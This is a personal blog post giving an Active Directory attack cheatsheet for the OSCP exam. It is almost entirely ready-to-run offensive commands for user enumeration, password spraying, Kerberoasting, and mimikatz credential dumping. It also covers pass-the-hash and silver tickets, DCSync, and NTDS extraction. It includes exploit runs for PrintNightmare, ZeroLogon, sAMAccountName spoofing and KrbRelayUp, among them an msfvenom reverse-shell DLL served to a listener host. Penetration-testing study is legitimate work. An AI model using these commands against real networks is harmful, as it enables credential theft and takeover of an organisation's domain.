mkiesel.ch

Active Directory Cheatsheet

26. Apr 2022, by manu in posts

Here are some tips and tricks that got me thru the AD part of my OSCP exam.

Please note that this cheatsheet is outdated. A update is in progress.

Set DNS / hosts #

Add the DC and all found clients into your /etc/hosts file.

192.168.99.10 dc1.domain.com dc1 domain.com
192.168.99.20 client1.domain.com client1

You could add the DC to your /etc/resolv.conf. But that will make internet research slower since all your requests would first go and then timeout at the DC.

Get a Shell or Credentials #

DNS Recon

Use fierce↗ to check for other servers inside the AD.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

User Recon

Use windapsearch↗ to make LDAP queries. Often does not require a password!

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute↗ to enumerate users

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt 
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec↗ to enumerate users

cme IP -u '' -p '' --users

# Get password policy
cme IP -u '' -p '' --pass-poll

Use username-anarchy↗ to format found names on company websites

username-anarchy -i INFILE > OUTFILE

Use cewl↗ to crawl websites for words to pack into a wordlist

cewl -d DEPTH -m MINIMUMLENGT --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

RPC Recon

# Could require credentials
rpcclient -u '' IP 
    enumdomusers
    enumdomgroups
    # Check printer description for passwords
    enumprinters

impacket-rpcdump IP
# Check for PrinterNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

SMB Recon

Check for anonymous/open shares

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

After Shell and or Credentials #

Get a Shell #

Some ways to get a shell by just having a pair of credentials:

# Common
impacket-psexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-smbexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-wmiexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP

# Winrm (tcp/5985) need to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD'  IP

# Quite rare
impacket-atexec 'DOMAIN\user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN\user:PASSWORD@IP'

Check for ASREPRoast #

# AD attrib: DONT_REQ_PREAUTH
impacket-GetNPUsers 'DOMAIN\user:PASSWORD' -dc-ip DCIP 

Check for Kerberoast #

impacket-GetUserSPNs 'DOMAIN\user:PASSWORD@DCIP'

Basic PowerShell script you can run from a shell inside the AD:

$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# Search by what
$Searcher.filter="serviceprincipalname=*"

$Result = $Searcher.Findall()

Write-Host "---------------------------"
Foreach($obj in $Result)
{
    
    ForEach($prop in $obj.Properties) {
        # uncommnent to print all attributes
        #$prop
    }
    Write-Host "[SAM Account Name]"
    $obj.Properties.samaccountname
    Write-Host ""
    Write-Host "[User Principal Name]"
    $obj.Properties.userprincipalname
    Write-Host ""
    Write-Host "[Service Principal Name]"
    $obj.Properties.serviceprincipalname
    Write-Host "---------------------------"
}

To request the ticket with PowerShell:

add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'

To request the ticket with mimikatz:

.\mimikatz.exe
    kerberos::ask /target:SPN
    kerberos::list /export

Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.

.\mimikatz.exe
    # Verify the ticket exists
    kerberos::list
    # Export to current folder
    kerberos::list /export

Transfer the ticket to Kali, and crack it with kerberoast↗.

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone https://github.com/nidem/kerberoast/     
cd kerberoast
pip3 install pyasn1

# Crack
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with Hashcat and kirbi2hashcat↗.

python kirbi2hashcat.py ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

Check for the Big Exploits #

Those exploits only require valid domain credentials.

PrinterNightmare #

CVE-2021-1675

Check with:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
cd /SHOME/PATH/SOMEFOLDER
git clone https://github.com/cube0x0/impacket
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py -O ./impacket/CVE-2021-1675.py
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2
cd /SHOME/PATH/SOMEFOLDER
source impacket/bin/activate
cd impacket

msfvenom -p windows/shell_reverse_tcp LHOST=LISTEINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
smbserver.py drop $(pwd) -smb2support

# Set up listener

# Terminal 1
python3 CVE-2021-1675.py domain.com/user:password@dcip '\\LISTEINGIP\drop\evil.dll'

SAM the Admin #

CVE-2021-42278
CVE-2021-42287

git clone https://github.com/WazeHell/sam-the-admin
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

python sam_the_admin.py DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios domain.com

ZeroLogon #

CVE-2020-1472

git clone https://github.com/risksense/zerologon/
cd zerologon

# DC NAME NOT FQDN!
python3 set_empty_pw.py DCNAME DCIP

goldenPAC #

CVE-2014-6324

impacket-goldenPac 'domain.com/user:password@dc'

Tools #

Mimikatz #

# Hashdump
.\mimikatz.exe
    # Elevate
    privilege::debug
    # Check for logged on passwords (requiers admin/system)
    sekurlsa::logonpasswords
    # Dump SAM
    lsadump::lsa /patch

# Overpass the Hash
.\mimikatz.exe
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
klist
net use \\DC
klist

# Pass the Ticket
.\mimikatz.exe
    # Elevate
    privilege::debug
    # Export the tickets
    # Creates .kirbi files in current folder
    sekurlsa::tickets /export

    # Load Ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket
.\mimikatz.exe
    # Elevate
    privilege::debug
    kerberos::purge
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rce4:SERVICEHASH /ptt

Rubeus #

# Harvest TGTs
.\Rubeus.exe harvest /interval:30

# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200  /usr/share/wordlists/rockyou.txt

CrackMapExec #

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success

Bloodhound #

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely 
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All

# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName loot.zip

Other Techniques #

KrbRelayUp #

Will get you a local SYSTEM shell if LDAP Signing and LDAP Channel Binding are not enforced

# https://github.com/Dec0ne/KrbRelayUp
# Do not use cmd.exe or powershell.exe. Those will spawn on desktop not in shell
.\KrbRelayUp.exe relay -d domain.com -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d domain.com -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

Pass the Hash #

Works only on servers with NTML authentication.

pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH

Dump local SAM and Crack Hashes #

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

samdump sam.out system.out -o hashes.txt

hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john  hashes.txt -format=nt -wordlist /usr/share/wordlists/rockyou.txt

Dump the NTDS #

secretsdump.py -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history

DC Sync Attack #

Needs GetChangesAll

secretsdump.py DOMAIN/USER@DCIP
secretsdump.py DOMAIN/USER@DCIP -just-dc-user USERTOGETHASH

SPN Impersonate #

Needs TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

# We need to have the same time as the DC
# Stop getting time from vhost
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo service sudo ntpdate DCIP

getST.py -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate administrator DOM/USER
export KRB5CCNAME=Administrator.ccache

impacket-psexec -k DOMAIN/Administrator@DC -no-pass

# Revert NTP to VBox
sudo service virtualbox-guest-utils start

Show LAPS Passwords #

If an owned user is either LAPS admin or just LAPS reader:

ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd